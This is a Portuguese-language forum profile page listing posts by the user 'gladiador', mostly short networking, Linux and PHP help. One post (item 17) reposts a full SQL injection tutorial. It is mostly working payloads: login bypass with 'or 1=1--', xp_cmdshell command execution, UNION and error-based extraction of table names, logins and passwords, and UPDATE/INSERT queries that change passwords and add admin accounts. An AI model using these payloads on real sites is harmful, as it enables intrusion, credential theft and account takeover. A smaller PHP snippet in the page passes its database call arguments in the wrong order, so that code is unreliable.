Ir para conteúdo
Fórum Script Brasil

gladiador

Veteranos
  • Total de itens

    2.281
  • Registro em

  • Última visita

Tudo que gladiador postou

  1. /* Placa não impede nada, o que impede é a não configuração correta, a não ser que esteja com defeito mas dai é outra coisa */
  2. /* aqui vai ser difícil, pois, o assunto é amplo e principalmente quando se trata de active directory, aconselho um livro. */
  3. gladiador

    Ip Na Rede

    /* Deculpe-me amiguinho, mas sua pergunta não tem coerência, pois, existe dois IPs você sabe que eles estão na rede, então talvez você queira dizer que os hosts estão inalcançáveis, seria isto ? ou seja, você não tem contato com os outros hosts, isto devido a configuração de net mask ou até mesmo por falta de conhecinmento entre classes de rede, ou ainda por cabos ou ainda por falta de configuração */
  4. gladiador

    Redes

    /* procure por programas que façam QoS o Netplus por exemplo, se for LINUX até o IPTABLES que um FireWall faz isso */
  5. /* tudo bem, quando se falar de maquininhas sem problemas, ai você tem razão !!! mas me referi a quando tal protocolo era utilizado em uma verdadeira rede tipo lan , manja ??? */
  6. /* o Change Mode está disponível no windows 2000, quando se trabalha com Active Directory e Domínios , mas este não é o seu caso , é ??? e o CHMOD no LINUX, comando oriundo de UNIX, este comando mostra o poder de segurança do LINUX, ou seja, nível de arquivos e não somente de pastas como o windows: exemplo: # chmod 755 /home/temp ou ainda # chmod +x arquivo.txt expilcando: r=1 (ler) w=2 (escrever) x=4 (executar) u= usuario // para o usuário vou dar permissão total r=1 w=2 x=4 = total 1+2+4 = 7 g= grupo // para grupo permissão leitura = 1 o= outros // outros nenhuma permissão = 0 então: #chmod 710 arquivo.txt */
  7. /* É só adaptar ao seu código .... <? $sql= "SELECT *from sua_tabela"; $rs = mysql_query($sua_conexao, $sql); while ( $linha = mysql_fetch_array($rs)){ $campo1 = $linha['campo1']; $campo2 = $linha['campo2']; } ?> Formulário */
  8. gladiador

    Webmin

    /* desse modo: 127.0.0.1:10000 */
  9. /* meu tá um tolete para carregar, sei lá !!!! sou suspeito para falar de flash , achei meio rústico, não pago R$ 300,00 */
  10. /* IPX é novel e por incrível que pareça ainda existe emprsas que trabalham na plataforma , o único que não vi e realmente sumiu foi o X25 , de resto apple talk , IPX ainda existem nos radicais que não querem a migração */
  11. gladiador

    Apache Em Rede

    /* Se que tá cuidando da parte de input da rede ? cuidado ao abrir a 80 , o correto seria em um firewall rotear para dentro do server apache, inclusive com ips já pré definidos. exemplo: #iptables -t nat -A PREROUTING -p tcp –d iporigem -–dport 80 -j DNAT –-to ipservidor:80 isto seria o mais correto e afetaria o mínimo a segurança, sem contar que para ficar mais seguro ainda poderia enjaular o servidor através de um chroot , dai sim fica 10000 */
  12. /* O que eu disse lá em cima o MAC trabalha com apple talk e desde de 1984 conforme wp, nunca mexi com Mac e talvez esteja enganado mas no que eu pesquisei inclusive nos caras que usam o mac ninguém fala de TCP/IP e sim do apple talk , agora se utliza TCP / IP , o problema do rapaz é fazer funcionar o LINUX é TCP/IP e necessita samba e o mac necessita MACLAN até onde fui informado, talvez esteja enganado */
  13. /* O apple talk já era. A apple hoje é tcp/ip. Quando o SO mudou para base freebsd eles abandonaram o appletalk. poderia colocar algo a respeito a fonte por exemplo : desconheço seria interessante. ainda o que sei é isso : Appletalk é o nome do protocolo para interconexão da Apple. Ele permite um modelo de rede ponto-a-ponto que provê funcionalidade básica tal como compartilhamento de arquivo e de impressora. Cada máquina pode, simultâneamente, agir como um cliente e servidor, e o “software” e “hardware” necessários estão incluídos em cada computador Apple. O Linux provê uma completa interconexão Appletalk. Nettalk é uma implementação, a nível de núcleo, do ptocolo AppleTalk , originalmente para sistemas derivados do BSD. Inclui suporte para roteamento AppleTalk, servindo sistemas de arquivo Unix e AFS filesystems sobre AFP (AppleShare), servindo impressoras Unix e acessando impressoras AppleTalk através de PAP. ======================================== então por favor nos indique a fonte de tal afirmação para que possamos nos atualizar . abraços */
  14. /* sem comentários, para mim nada a corrigir, simplesmente 10 */
  15. /* Mac trabalha com protocolo Aplle Talk, você terá que ter um programa no win 98 que interprete tal , se não me engano o maclan */
  16. /* cara isto é zica com o ADO de su sistema e não rede ok ? */
  17. /* um artigo legal !!! ======================================= SQL Injection Advanced sql injection Introdução Nataniel A.K.A < Stinger > stinger@hackermail.com http://www.windefense.hpg.com.br**********...*************** * * * * * * * * -------------------------------------------------------------------------------- 1 - O que é sql injection ? é um truque para injectar comandos SQL via paginas web , já que qualquer pagina web recebe parametros do usuario e os transmite para o banco de dados . Imaginemos por exemplo uma pagina web escrita em asp que nos peça o username e a password . O que a pagina web vai fazer é enviar o username e a password para o banco de dados e este verificar se é um user ou password validos ! Então porque não inserimos codigos SQL ? OK ! Isto só não é teoria como é possivel ! 2 - O que é preciso ? Qualquer web browser 3 - Onde eu começo ? Tente olhar por paginas que posssuam logins , submits , feedback search etc , enfim essencialmente paginas que possuam codigos asp ! Mas nós sabemos que os codigos em asp são interpretados no server ! ok ! tente olhar para o codigo HTML então . Por exemplo : Vemos aqui codigos delimitados por e que podem ser exploitados 4 - Que linguagens são vulneraveis ? Paginas web com ASP, JSP, CGI, ou PHP , tente por exemplo observar esta pagina http://windefense/index.asp?id=10 5 - Como testar se uma pagina é vulneravel ? Tente começando com um simples truque em um campo que receba parametros ex : username Password coloque : hi' or 1=1-- Podemos testar assim : username: hi' or 1=1-- Password: hi' or 1=1-- Ou com a seguinte URL http://windefense/index.asp?id=hi' or 1=1-- Nós tinhamos visto antes um form vulneravel , ele segue abaixo : Bem podemos fazer umas trocas para nossos intuitos !( Veja o html da pagina alvo e faça alterações e depois salve) http://windefense/Search/search.asp method=post> Se der certo podemos nos logar sem qualquer username ou password ! 6 - Como executar comandos remotos com SQL injection ? Se podemos injectar comandos sql então estamos aptos a correr comandos com boas permissoes , e note que o MS SQLserver corre por default com privilegios de sistema ! ( Equivalente a privilegios de administrador ) Observe por exemplo a seguinte string que nos permite executar comandos no server : master..xp_cmdshell Podemos tentar uma execução de comando : '; exec master..xp_cmdshell 'ping 10.10.1.2'-- Tente usar a cota dupla(") ou a simples(') se não der certo 7 - Caçando dados do banco de dados utilizando ODBC error message Nós podemos manipular os erros ODBC do banco de dados para trazer dados do banco de dados observe por exemplo esta URL normal : http://windefense/index.asp?id=10 nós podemos tentar unir ( UNION ) o valor '10' com outra string do banco de dados , observe : http://windefense/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- A tabela INFORMATION_SCHEMA.TABLES contem informações sobre todas as tabelas do sistema com a string TABLE_NAME podemos receber informações sobre nomes de tabelas no banco de dados . SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES- Retorna o nome da primeira tabela do banco de dados . Se o sql server tenta converter a string UNION para um integer ocorre o erro seguinte : Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. /index.asp, line 5 Algo nos interessa aqui . Podemos ver que provocamos um erro e retornamos o nome da 1ª tabela do banco de dados que é "table1" . Para obter o nome da proxima tabela inserimos a seguinte query : http://windefense/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')-- Ou procurar dados com uma query , inserindo um comando sql de comparação (LIKE) : http://windefense/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'-- Onde o output é o seguinte : Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int. /index.asp, line 5 Neste caso nos retornamos com a string , '%25login%25' na tabela escolhida (TABLE_NAME) , contendo a string "login" que retornou o login do admin que é "admin_login". Podemos mapear tabelas com a seguinte string : INFORMATION_SCHEMA.COLUMNS http://windefense/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'-- Output : Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int. /index.asp, line 5 Agora nós podemos usar a string NOT IN () para trazer o nome da proxima coluna : http://windefense/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. /index.asp, line 5 Agora se raciocinarmos um pouco podemos obter outras coisinhas importantes como nomes colunas de id's , passwords , detalhes etc com a seguinte query : http://windefense/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][sql Server]ORDER BY items must appear in the select list if the statement contains a UNION operator. /index.asp, line 5 Como retornar dados : Vimos acima que podemos identificar nomes de tabelas , colunas etc . Agora o bom disso é que podemos utilizar a mesma tecnica para retornar dados da mesma , como por exemplo retornar o 1º "login_name" da tabela "admin_login" com a seguinte query : http://windefense/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'neo' to a column of data type int. /index.asp, line 5 Já conhecemos o login_name que é "neo" agora precisamos conhecer a password com a sequinte query http://windefense/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int. /index.asp, line 5 Podemos ver realmente que retornamos aqui uma password "m4trix" para um user "neo" . Como retornar passwords com valor numerico ! Um problema com este tipo de retorno é que valores numericos não podem ser retornado via uma query do tipo : http://windefense/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'-- Se o usuario possui uma password do tipo : "31173" provavelmente teriamos no nosso browser o seguinte : "Page Not Found" Para resolver este problema nos podemos juntar uma string numerica com alguns alfabetos : http://windefense/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'-- Simplesmente usamos o sinal de (+) para juntar a password com qualquer texto que nós queremos (Codigo ASCII para '+' = 0x2b). Nós juntamos com um espaço(%20) a palavra morpheus . E manualmente chamando a função convert() para converter '31173 morpheus' dentro de um integer, o servidor sql retorna o seguinte erro : Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int. /index.asp, line 5 Podemos ver que a password "31173" é retornada antes da string "morpheus" Updates , e inserção de dados ! Se podemos retornar dados de uma tabela certamente que podemos updatear(actualizar) e inserir dados dentro do banco de dados : Imaginemos o seguinte cenario podemos trocar usernames , passwords , inserir novos users , novas passwords etc . Tentemos trocar a password para o user "neo" : UPDATE = Comando sql para actualizar dados http://windefense/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'-- Agora o user "neo" tem uma password com o nome "newpas5" INSERT = Comando sql para inserir dados Para inserir dados na database usamos a seguinte query : http://windefense/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')-- Podemos notar aqui novos valores da tabela admin_login como : ('login_id', 'login_name', 'password', 'details') para valores de : 666,'neo2','newpas5','NA' Podemos nos logar como user "neo" e pass "newpas5" conclusão : Este txt não foi nada lá dos melhores mas se termos em conta que ele foi apenas uma introdução já serve como petisco . Links e referencias : rfp - o homem que hackeou o forum da packetstorm http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6 como obter informações de erros ODBC http://www.blackhat.com/presentations/win-...1Litchfield.doc Um bom sumario de sqlinjection em sql servers http://www.owasp.org/asac/input_validation/sql.shtml A empresa sul-africana sensepost fala sobre sql injection http://www.sensepost.com/misc/SQLinsertion.htm
  18. gladiador

    Site

    /* Obrigado pelas avaliações, estarei fazendo as modificações , T+ */
  19. /* O que você quer fazer, ou seja, colocar duas placas de rede para os computadores se enxergarem, seria o mais correto um peer to peer, pois, duas eths se aplica em máquinas que irão atuar como server, mas não é o caso. utilize mesmo o HUB é mais coerente. */
  20. gladiador

    Clientes De E-mail

    /* utilizo o também é muito bom acho que deveria continuar com ele */
  21. gladiador

    Servidor

    /* Em Server LINUX Para mim o DEBIAN 2 opção indiscutivelmente o RED HAT */
  22. /* isso não é no PHP e sim no server , exemplo o Apache limita conexões , isso se faz em /etc/apache/httpd.conf , este arquivo é responsável pelo limite de conexões o resto é balela, existe sim banir por IPs , e outros macetes, porém nada se iguala ao correto ou seja, configuração no Server */
×
×
  • Criar Novo...